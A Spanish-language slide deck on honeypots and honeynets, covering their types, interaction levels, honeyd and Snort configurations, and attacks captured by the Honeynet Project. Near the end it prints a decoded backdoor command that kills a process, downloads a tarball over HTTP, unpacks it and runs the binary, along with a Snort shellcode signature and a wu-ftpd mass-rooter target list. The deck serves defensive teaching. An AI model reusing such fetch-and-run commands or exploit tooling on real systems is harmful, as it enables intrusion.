590 likes | 1.16k Views
Tarros de miel y redes trampa. El Ponente. Consultor de Seguridad en Germinus Miembro del grupo HIS Desarrollador de software libre Miembro del proyecto Debian Autor del Manual de Seguridad de Debian Desarrollador principal de Tiger
E N D
El Ponente • Consultor de Seguridad en Germinus • Miembro del grupo HIS • Desarrollador de software libre • Miembro del proyecto Debian • Autor del Manual de Seguridad de Debian • Desarrollador principal de Tiger • Colaborador en el desarrollo de Bastille y Nessus (entre otros)
Propósito Mostrar qué son los tarros de miel y las redes trampa, para qué sirven y qué aportan a la ingeniería de seguridad.
Resumen • El problema • Definición y tipos de los tarros de miel • Introducción a las redes trampa • Ejemplos de redes trampa • Descubrimientos • Recursos
El problema • Las organizaciones son objetivos estáticos, no se “mueve” y todo el mundo sabe dónde están. • Los “malos” tienen la iniciativa. Tienen recursos ilimitados y pueden atacarte cuando quieran, como quieran.
Solución Tradicional • Proteger su red lo mejor que pueda. • Esperar y desear que detecte cuando se produce un fallo.
Iniciativa Los tarros de miel y las redes trampa pueden dar la iniciativa.
Motivos e intenciones J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
Historia • 1990 • The Cuckoo’s Egg • Una noche con Berferd • 1997 - Deception Toolkit • 1998 - NetFacade y CyberCop Sting • 1999 - El proyecto Honeynet • 2001 - Capturas de gusanos
Definición Recursos de seguridad cuyo valor reside en ser sondeados, atacados o comprometidos.
Concepto • Recursos que no tienen servicios en producción ni uso autorizado. • Lo más probable es que cualquier conexión sea una sonda o un ataque, cualquier uso es no autorizado.
Una herramienta, no una solución • Los tarros de miel son muy flexibles, son de muchas formas y tamaños. • No se diseñan para un problema específico. • Puede utilizarse para distintos propósitos.
Ventajas • Información valiosa • Número reducido de falsos positivos • Número reducido de falsos negativos • Concepto simple • No exige muchos recursos • Retorno de la inversión
Desventajas • Riesgo • Punto de vista limitado • No protege sistemas vulnerables
Tipos de tarros de miel • Producción • Incrementa la seguridad en su red: protección, detección y respuesta • Investigación • Utilizada para recoger información • Alerta temprana y predicción de ataques
Nivel de interacción • Los objetivos de los tarros de miel son distintos. • La funcionalidad depende de sus objetivos. Cuanto más pueda hacer un atacante en un tarro de miel, mayor es el nivel de interacción.
Nivel de interacción. • A mayor interacción más se puede conocer sobre el atacante. • Cuanto mayor la interacción, mayor el riesgo. • Los tarros de miel de producción suelen tener baja interacción mientras que las de investigación tienen alta interacción.
Niveles • Bajo – Emula servicios. Ejemplos: BackOfficer Friendly o Honeyd. • Medio – Acceso limitado a un sistema operativo controlado. Ejemplo: entorno chroot o de jaula. • Alto – Acceso a un sistema operativo totalmente funcional. Ejemplo: ManTrap o las redes trampa.
¿Cual es mejor? ¡Ninguno! Tienen todas ventajas y desventajas. Depende en lo que se quiera conseguir.
Baja interacción • Emula vulnerabilidades: Un atacante está limitado a interactuar con los servicios que se ofrezcan, y el nivel de funcionalidad que se le de a éstos. • Utilizado fundamentalmente para detectar o confundir. • Captura de información limitada.
Emulación de servidor de FTP case $incmd_nocase in QUIT* ) echo -e "221 Goodbye.\r" exit 0;; SYST* ) echo -e "215 UNIX Type: L8\r" ;; HELP* ) echo -e "214-The following commands are recognized (* =>'s unimplemented).\r" echo -e " USER PORT STOR MSAM* RNTO NLST MKD CDUP\r" echo -e " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP\r" echo -e " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOU\r" echo -e " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE\r" echo -e " REIN* MODE MSND* REST XCWD HELP PWD MDTM\r" echo -e " QUIT RETR MSOM* RNFR LIST NOOP XPWD\r" echo -e "214 Direct comments to ftp@$domain.\r" ;; USER* ) parm1_nocase=`echo $parm1 | gawk '{print toupper($0);}'` if [ "$parm1_nocase" == "ANONYMOUS" ] then echo -e "331 Guest login ok, send your complete e-mail address as a password.\r" AUTH="ANONYMOUS" else echo -e "331 Password required for $parm1\r" AUTH=$parm1 fi ;;
Alta interacción • Ofrece un sistema operativo completo para que el atacante interactúe con él. • Usado principalmente para investigación y respuesta, pero también puede ser utilizado para prevención y detección. • Complejas de desplegar, pero potencialmente más seguro que las jaulas • Captura gran cantidad de información. • NO emula
Valor de redes trampa de producción • Protección • Detección • Respuesta
Valor de redes trampa de investigación • Recogida de inteligencia • Predicción y Alerta Temprana
Redes Trampa de producción • BackOfficer Friendly • LaBrea Tarpit • Deception Toolkit • Smoke Detector • Specter • Honeyd
Honeyd.conf create default set default personality "FreeBSD 2.2.1-STABLE" set default default tcp action reset add default tcp port 80 "sh /etc/Honeyd/scripts/web.sh" add default tcp port 22 "sh /etc/Honeyd/scripts/test.sh" add default tcp port 113 open add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default tcp action reset add windows tcp port 80 ”perl /etc/Honeyd/scripts/iis/main.pl" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set windows uptime 3284460 bind 192.168.1.200 windows
Nmap.prints # Contributed by Vilius beneti@sc.ktu.lt Fingerprint Windows NT 4.0 Server SP5-SP6 TSeq(Class=RI%gcd=<8%SI=<11784E&>2CA4) T1(DF=Y%W=2017%ACK=S++%Flags=AS%Ops=MNWNNT) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=Y%W=2017%ACK=O%Flags=A%Ops=NNT) T4(DF=N%W=0%ACK=O%Flags=R%Ops=) T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(DF=N%W=0%ACK=O%Flags=R%Ops=) T7(DF=N%W=0%ACK=S++%Flags=AR%Ops=) PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Tarros de miel de investigación • ManTrap • Redes trampa
ManTrap Sistema Operativo Host Jaula 1 Jaula 2 Jaula 3 Jaula 4
Red Trampa (Honeynet) • Tarro de miel OpenSource. • Se trata de una arquitectura, no es ni un producto ni ningún software concreto. • Poblada de sistemas “vivos”.
Control de Datos - GenII alert tcp $HONEYNET any -> any 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000E8D7 FFFFFF|/ben/sh";) http://www.snort.org
El proyecto Honeynet • Una organización de voluntarios dedicados a la investigación de riesgos cibernéticos. • Desplegando redes a lo largo del planeta para que sean atacadas
TESO wu-ftpd mass-Mass-rooter 1 | Caldera eDesktop|OpenLinux 2.3 update[wu-ftpd-2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
Nuevas tácticas - puertas traseras 02/19-04:34:10.529350 206.123.208.5 -> 172.16.183.2 PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen:422 02 00 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 ...5.7.=.8..6..H D3 5D D9 62 EF 6B A2 F4 2B AE 3E C3 52 89 CD 57 .].b.k..+.>.R..W DD 69 F2 6C E8 1F 8E 29 B4 3B 8C D2 18 61 A9 F6 .i.l...).;...a.. 3B 84 CF 18 5D A5 EC 36 7B C4 15 64 B3 02 4B 91 ;...]..6{..d..K. 0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C 02 88 CD 58 ...Q..#.2..|...X D6 67 9E F0 27 A1 1C 53 99 24 A8 2F 66 B8 EF 7A .g..'..S.$./f..z F2 7B B2 F6 85 12 A3 20 57 D4 5A E0 25 B0 2E BF .{..... W.Z.%... F6 48 7F C4 0A 95 20 AA 26 AF 3C B8 EF 41 78 01 .H.... .&.<..Ax. 85 BC 00 89 06 3D BA 40 C6 0B 96 14 A5 DC 67 F2 .....=.@......g. 7C F8 81 0E 8A DC F3 0A 21 38 4F 66 7D 94 AB C2 |.......!8Of}... D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B 32 ....5Lcz.......2 49 60 77 8E A5 BC D3 EA 01 18 2F 46 5D 74 8B A2 I`w......./F]t.. B9 D0 E7 FE 15 2C 43 5A 71 88 9F B6 CD E4 FB 12 .....,CZq....... 29 40 57 6E 85 9C B3 CA E1 F8 0F 26 3D 54 6B 82 )@Wn.......&=Tk. 99 B0 C7 DE F5 0C 23 3A 51 68 7F 96 AD C4 DB F2 ......#:Qh...... 09 20 37 4E 65 7C 93 AA C1 D8 EF 06 1D 34 4B 62 . 7Ne|.......4Kb 79 90 A7 BE D5 EC 03 1A 31 48 5F 76 8D A4 BB D2 y.......1H_v.... E9 00 17 2E 45 5C 73 8A A1 B8 CF E6 FD 14 2B 42 ....E\s.......+B 59 70 87 9E B5 CC E3 FA 11 28 3F 56 6D 84 9B B2 Yp.......(?Vm... C9 E0 F7 0E 25 3C 53 6A 81 98 AF C6 DD F4 0B 22 ....%<Sj......." 39 50 67 7E 95 AC C3 DA F1 08 1F 36 4D 64 7B 92 9Pg~.......6Md{. A9 C0 D7 EE 05 1C 33 4A 61 78 8F A6 BD D4 EB 02 ......3Jax...... 19 30 47 5E 75 8C A3 BA D1 E8 FF 16 2D 44 5B 72 .0G^u.......-D[r 89 A0 B7 CE E5 FC 13 2A 41 58 6F 86 9D B4 CB E2 .......*AXo..... F9 10 27 3E 55 6C 83 9A B1 C8 DF F6 0D 24 3B 52 ..'>Ul.......$;R 69 80 i.
Orden descifrada de la puerta trasera starting decode of packet size 420 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 D3 5D local buf of size 420 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73 ..killall -9 tts 65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75 erve ; lynx -sou 72 63 65 20 68 74 74 70 3A 2F 2F 31 39 32 2E 31 rce http://192.1 36 38 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F 68.103.2:8882/fo 6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F 2E 74 67 7A o > /tmp/foo.tgz 20 3B 20 63 64 20 2F 74 6D 70 20 3B 20 74 61 72 ; cd /tmp ; tar 20 2D 78 76 7A 66 20 66 6F 6F 2E 74 67 7A 20 3B -xvzf foo.tgz ; 20 2E 2F 74 74 73 65 72 76 65 20 3B 20 72 6D 20 ./ttserve ; rm 2D 72 66 20 66 6F 6F 2E 74 67 7A 20 74 74 73 65 -rf foo.tgz ttse 72 76 65 3B 00 00 00 00 00 00 00 00 00 00 00 00 rve;............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ B1 91 00 83 6A A6 39 05 B1 BF E7 6F BF 1D 88 CB ....j.9....o.... C5 FE 24 05 00 00 00 00 00 00 00 00 00 00 00 00 ..$.............